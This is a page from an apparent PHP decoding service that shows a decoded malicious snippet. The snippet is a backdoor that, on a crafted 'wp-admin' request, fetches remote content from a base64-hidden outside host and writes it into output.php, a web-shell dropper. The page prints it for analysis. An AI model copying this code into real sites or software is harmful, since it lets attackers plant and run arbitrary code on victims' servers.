Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){ file_put_conten..
Decoded Output download
<? if(trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){
file_put_contents('output.php',file_get_contents(base64_decode('aHR0cDovL2FwaS5zdG9yZW91dGxldC50b3Avc2hlMy8/ZmlsZT0=') . $_GET['file'] . '.txt&mini=on'));
echo "done";
exit;
}
?>
Did this file decode correctly?
Original Code
if(trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){
file_put_contents('output.php',file_get_contents(base64_decode('aHR0cDovL2FwaS5zdG9yZW91dGxldC50b3Avc2hlMy8/ZmlsZT0=') . $_GET['file'] . '.txt&mini=on'));
echo "done";
exit;
}
?>
Function Calls
trim | 1 |
Stats
MD5 | 0ed4c02baa7ee5602a98cc7d310fd9b2 |
Eval Count | 0 |
Decode Time | 48 ms |